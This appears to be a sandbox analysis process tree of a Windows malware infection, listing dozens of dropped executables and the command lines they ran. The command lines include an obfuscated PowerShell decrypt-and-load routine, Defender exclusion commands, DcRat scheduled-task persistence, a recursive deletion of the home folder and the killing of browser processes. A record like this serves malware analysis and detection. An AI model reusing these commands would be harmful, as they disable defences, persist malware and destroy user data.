        PID:6848
        
        C:\Users\Admin\Pictures\GMJEJN~1.EXE
        
        C:\Users\Admin\Pictures\GMJEJN~1.EXE --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x340,0x344,0x348,0x31c,0x34c,0x63f69530,0x63f6953c,0x63f69548
        8⤵
        
        PID:7500
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GMJEJN~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GMJEJN~1.EXE" --version
        8⤵
        
        PID:2740
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\INBWUE~1.EXE"
        6⤵
        
        PID:7548
        
        C:\Users\Admin\Pictures\INBWUE~1.EXE
        
        C:\Users\Admin\Pictures\INBWUE~1.EXE
        7⤵
        
        PID:1600
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FLT_SH~1.EXE"
    3⤵
    PID:5604
  - - C:\Users\Admin\AppData\Local\Temp\Files\FLT_SH~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\FLT_SH~1.EXE
      4⤵
      PID:3092
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
    3⤵
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
      C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
      4⤵
      PID:1604
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        5⤵
        
        PID:3480
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd" "
        6⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd"
        7⤵
        
        PID:6304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        8⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        
        PID:7036
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        9⤵
        
        PID:6248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe add-mppreference -exclusionpath @('C:\','D:\','F:\')
        10⤵
        
        PID:772
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\VVF34K~1.EXE"
        9⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\VVF34K~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\VVF34K~1.EXE
        10⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd';$RfUL='SplstIeistIetstIe'.Replace('stIe', ''),'TrfmgKafmgKnfmgKsfmgKfofmgKrfmgKmFfmgKinafmgKlBfmgKlofmgKckfmgK'.Replace('fmgK', ''),'DecHsSjomHsSjpHsSjrHsSjessHsSj'.Replace('HsSj', ''),'EleBZnKmBZnKeBZnKntBZnKAtBZnK'.Replace('BZnK', ''),'ReGrwradGrwrLiGrwrnGrwreGrwrsGrwr'.Replace('Grwr', ''),'CIOLbopIOLbyIOLbTIOLboIOLb'.Replace('IOLb', ''),'FrpwLNompwLNBapwLNspwLNepwLN6pwLN4SpwLNtpwLNripwLNnpwLNgpwLN'.Replace('pwLN', ''),'LZaAAoZaAAaZaAAdZaAA'.Replace('ZaAA', ''),'IswsYnswsYvokswsYeswsY'.Replace('swsY', ''),'MayHpwinyHpwMoyHpwduyHpwleyHpw'.Replace('yHpw', ''),'EnfcpnnfcptrynfcpPnfcponfcpinnfcptnfcp'.Replace('nfcp', ''),'GKVjZetCKVjZurKVjZrKVjZenKVjZtPrKVjZocKVjZessKVjZ'.Replace('KVjZ', ''),'CmmRYhanmmRYgmmRYeExmmRYtenmmRYsmmRYimmRYonmmRY'.Replace('mmRY', ''),'CrewBkzatwBkzeDwBkzecwBkzrywBkzptwBkzowBkzrwBkz'.Replace('wBkz', '');powershell -w hidden;function HYZRs($YjbML){$FKFbd=[System.Security.Cryptography.Aes]::Create();$FKFbd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$FKFbd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$FKFbd.Key=[System.Convert]::($RfUL[6])('2M0fT7QfMAGeiJeE2Y8HU5skhkMH0OcAFA0SFzRHVws=');$FKFbd.IV=[System.Convert]::($RfUL[6])('Wv0CCTjoJ02lflet8TKTGg==');$qvWHS=$FKFbd.($RfUL[13])();$UQnTy=$qvWHS.($RfUL[1])($YjbML,0,$YjbML.Length);$qvWHS.Dispose();$FKFbd.Dispose();$UQnTy;}function tsjtk($YjbML){$KLabx=New-Object System.IO.MemoryStream(,$YjbML);$CeqVN=New-Object System.IO.MemoryStream;$OFOrH=New-Object System.IO.Compression.GZipStream($KLabx,[IO.Compression.CompressionMode]::($RfUL[2]));$OFOrH.($RfUL[5])($CeqVN);$OFOrH.Dispose();$KLabx.Dispose();$CeqVN.Dispose();$CeqVN.ToArray();}$xZSiw=[System.IO.File]::($RfUL[4])([Console]::Title);$VwJSg=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 5).Substring(2))));$NGyKN=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 6).Substring(2))));[System.Reflection.Assembly]::($RfUL[7])([byte[]]$NGyKN).($RfUL[10]).($RfUL[8])($null,$null);[System.Reflection.Assembly]::($RfUL[7])([byte[]]$VwJSg).($RfUL[10]).($RfUL[8])($null,$null); "
        8⤵
        
        PID:6984
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1508
        5⤵
        Program crash
        
        PID:1980
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
    3⤵
    PID:3984
  - - C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
      C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
      4⤵
      PID:1796
    - - C:\Users\Admin\AppData\Local\Temp\is-894U8.tmp\is-MGI0N.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-894U8.tmp\is-MGI0N.tmp" /SL4 $C0370 "C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe" 9527383 52224
        5⤵
        
        PID:2856
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\M5TRAI~1.EXE"
    3⤵
    PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\Files\M5TRAI~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\M5TRAI~1.EXE
      4⤵
      PID:2372
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        5⤵
        
        PID:5608
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        5⤵
        
        PID:4732
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"
    3⤵
    PID:5288
  - - C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe
      4⤵
      PID:3856
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Files\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1705179029 "
        5⤵
        
        PID:6852
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE"
    3⤵
    PID:4704
  - - C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE
      4⤵
      PID:2884
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
    3⤵
    PID:6244
  - - C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
      C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
      4⤵
      PID:6356
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        5⤵
        
        PID:6520
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        5⤵
        
        PID:7040
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        5⤵
        
        PID:5876
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CLIENT~1.EXE"
    3⤵
    PID:5528
  - - C:\Users\Admin\AppData\Local\Temp\Files\CLIENT~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\CLIENT~1.EXE
      4⤵
      PID:6512
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:7112
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"
    3⤵
    PID:6320
  - - C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
      C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
      4⤵
      PID:6960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        5⤵
        
        PID:6932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        5⤵
        
        PID:5380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD296.tmp.bat""
        5⤵
        
        PID:7072
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:5680
      - C:\ProgramData\common\JTPFKOXW.exe
        
        "C:\ProgramData\common\JTPFKOXW.exe"
        6⤵
        
        PID:6892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        7⤵
        
        PID:4320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        
        PID:5844
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JTPFKOXW" /tr "C:\ProgramData\common\JTPFKOXW.exe"
        7⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn JTPFKOXW /tr C:\ProgramData\common\JTPFKOXW.exe
        8⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn JTPFKOXW /tr C:\ProgramData\common\JTPFKOXW.exe
        9⤵
        DcRat
        Creates scheduled task(s)
        
        PID:6884
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"
    3⤵
    PID:6332
  - - C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe
      C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe
      4⤵
      PID:7064
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PsExec.exe"
    3⤵
    PID:7124
  - - C:\Users\Admin\AppData\Local\Temp\Files\PsExec.exe
      C:\Users\Admin\AppData\Local\Temp\Files\PsExec.exe
      4⤵
      PID:4980
    - - C:\Users\Admin\AppData\Local\Temp\Files\._cache_PsExec.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\._cache_PsExec.exe"
        5⤵
        
        PID:6832
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6832 -s 812
        6⤵
        Program crash
        
        PID:6376
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PSSERV~1.EXE"
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\Files\PSSERV~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\PSSERV~1.EXE
      4⤵
      PID:7068
    - - C:\Users\Admin\AppData\Local\Temp\Files\._cache_PSSERV~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\._cache_PSSERV~1.EXE"
        5⤵
        
        PID:5848
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 808
        6⤵
        Program crash
        
        PID:7164
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe"
    3⤵
    PID:5708
  - - C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe
      C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe
      4⤵
      PID:6880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C AT /delete /yes
        5⤵
        
        PID:4404
      - C:\Windows\SysWOW64\at.exe
        
        AT /delete /yes
        6⤵
        
        PID:6348
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
        5⤵
        
        PID:5588
      - C:\Windows\SysWOW64\at.exe
        
        AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
        6⤵
        
        PID:5104
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
    3⤵
    PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
      C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
      4⤵
      PID:1860
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"
    3⤵
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe
      C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe
      4⤵
      PID:6620
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CAD1.tmp\CAD2.tmp\CAD3.bat C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"
        5⤵
        
        PID:3324
      - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        6⤵
        
        PID:1308
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"
    3⤵
    PID:4924
  - - C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe
      C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe
      4⤵
      PID:4332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove-Item $HOME -Recurse
        5⤵
        
        PID:1428
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
    3⤵
    PID:1980
  - - C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
      C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
      4⤵
      PID:5756
  - - C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
      C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
      4⤵
      PID:6660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        
        PID:6096
      - C:\Windows\System32\certutil.exe
        
        C:\Windows\System32\certutil.exe
        6⤵
        
        PID:2852
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6676
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe"
    3⤵
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe
      4⤵
      PID:644
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe" /rl HIGHEST /f
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3296
    - - C:\Windows\SysWOW64\SubDir\asg.exe
        
        "C:\Windows\SysWOW64\SubDir\asg.exe"
        5⤵
        
        PID:7104
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:5524
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe"
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe
      C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe
      4⤵
      PID:2024
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\POCKET~1.EXE"
    3⤵
    PID:7152
  - - C:\Users\Admin\AppData\Local\Temp\Files\POCKET~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\POCKET~1.EXE
      4⤵
      PID:4528
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\2014-0~1.EXE"
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\Files\2014-0~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\2014-0~1.EXE
      4⤵
      PID:5708
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
    3⤵
    PID:6984
  - - C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
      C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
      4⤵
      PID:3696
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        5⤵
        
        PID:2772
      - C:\Windows\SysWOW64\taskkill.exe
        
        "taskkill.exe" /im chrome.exe /f
        6⤵
        Kills process with taskkill
        
        PID:7992
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe"
    3⤵
    PID:6724
  - - C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe
      C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe
      4⤵
      PID:1980
    - - C:\Windows\SysWOW64\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\vNN6.cpl",
        5⤵
        
        PID:3932
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\vNN6.cpl",
        6⤵
        
        PID:748
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\vNN6.cpl",
        7⤵
        
        PID:5292
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\vNN6.cpl",
        8⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\vNN6.cpl",
        9⤵
        
        PID:7540
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
    3⤵
    PID:2436
  - - C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
      C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
      4⤵
      PID:1344
    - - C:\Windows\System32\werfault.exe
        
        \??\C:\Windows\System32\werfault.exe
        5⤵
        
        PID:6860
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SAFMAN~1.EXE"
    3⤵
    PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\Files\SAFMAN~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\SAFMAN~1.EXE
      4⤵
      PID:2808
    - - C:\Users\Admin\AppData\Local\Temp\is-DOGEI.tmp\SAFMAN~1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DOGEI.tmp\SAFMAN~1.tmp" /SL5="$2070C,7621741,67584,C:\Users\Admin\AppData\Local\Temp\Files\SAFMAN~1.EXE"
        5⤵
        
        PID:7528
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SATAN_~1.EXE"
    3⤵
    PID:3340
  - - C:\Users\Admin\AppData\Local\Temp\Files\SATAN_~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\SATAN_~1.EXE
      4⤵
      PID:7384
    - - C:\Users\Admin\AppData\Local\Temp\Files\3BFNoYCV_AIO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\3BFNoYCV_AIO.exe"
        5⤵
        
        PID:1444
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:7424
      - C:\Users\Admin\AppData\Local\Temp\Files\Y38is7oV_AIO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\Y38is7oV_AIO.exe"
        6⤵
        
        PID:6096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        7⤵
        
        PID:7844
        
        C:\Users\Admin\AppData\Local\Temp\Files\3wZFU01M_AIO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\3wZFU01M_AIO.exe"
        7⤵
        
        PID:6580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        8⤵
        
        PID:7844
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
    3⤵
    PID:7488
  - - C:\Users\Admin\AppData\Local\Temp\Files\6.exe
      C:\Users\Admin\AppData\Local\Temp\Files\6.exe
      4⤵
      PID:7676
    - - C:\Users\Admin\AppData\Local\Temp\Files\6.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\6.exe /stext "C:\Users\Admin\AppData\Local\Temp\mtroqohbpclwzzbowevy"
        5⤵
        
        PID:7244
    - - C:\Users\Admin\AppData\Local\Temp\Files\6.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\6.exe /stext "C:\Users\Admin\AppData\Local\Temp\wnegryrvdkdjbnxsfhqaher"
        5⤵
        
        PID:3516
    - - C:\Users\Admin\AppData\Local\Temp\Files\6.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\6.exe /stext "C:\Users\Admin\AppData\Local\Temp\zpjrsrcxrtvomtmwxrdbkjlgyw"
        5⤵
        
        PID:7328
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\RDPSER~1.EXE"
    3⤵
    PID:7300
  - - C:\Users\Admin\AppData\Local\Temp\Files\RDPSER~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\RDPSER~1.EXE
      4⤵
      PID:7588
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SETUP2~1.EXE"
    3⤵
    PID:5960
  - - C:\Users\Admin\AppData\Local\Temp\Files\SETUP2~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\SETUP2~1.EXE
      4⤵
      PID:7380
    - - C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
        5⤵
        
        PID:3244
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mode con:cols=0080 lines=0025
        6⤵
        
        PID:7780
        
        C:\Windows\SysWOW64\mode.com
        
        mode con:cols=0080 lines=0025
        7⤵
        
        PID:8184
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c title Window Title
        6⤵
        
        PID:1440
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"
        6⤵
        
        PID:748
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"
        6⤵
        
        PID:236
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
        6⤵
        
        PID:7180
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
        7⤵
        Views/modifies file attributes
        
        PID:7280
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt
        6⤵
        
        PID:7956
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat
        6⤵
        
        PID:6232
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp68645.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp68645.bat"
        6⤵
        
        PID:7876
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp55745.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp55745.exe"
        6⤵
        
        PID:7984
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp68645.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
        6⤵
        
        PID:4476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp68645.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
        7⤵
        
        PID:6872
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp68645.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp68645.bat"
        6⤵
        
        PID:7544
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp55745.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp55745.exe"
        6⤵
        
        PID:5960
    - - C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe
        
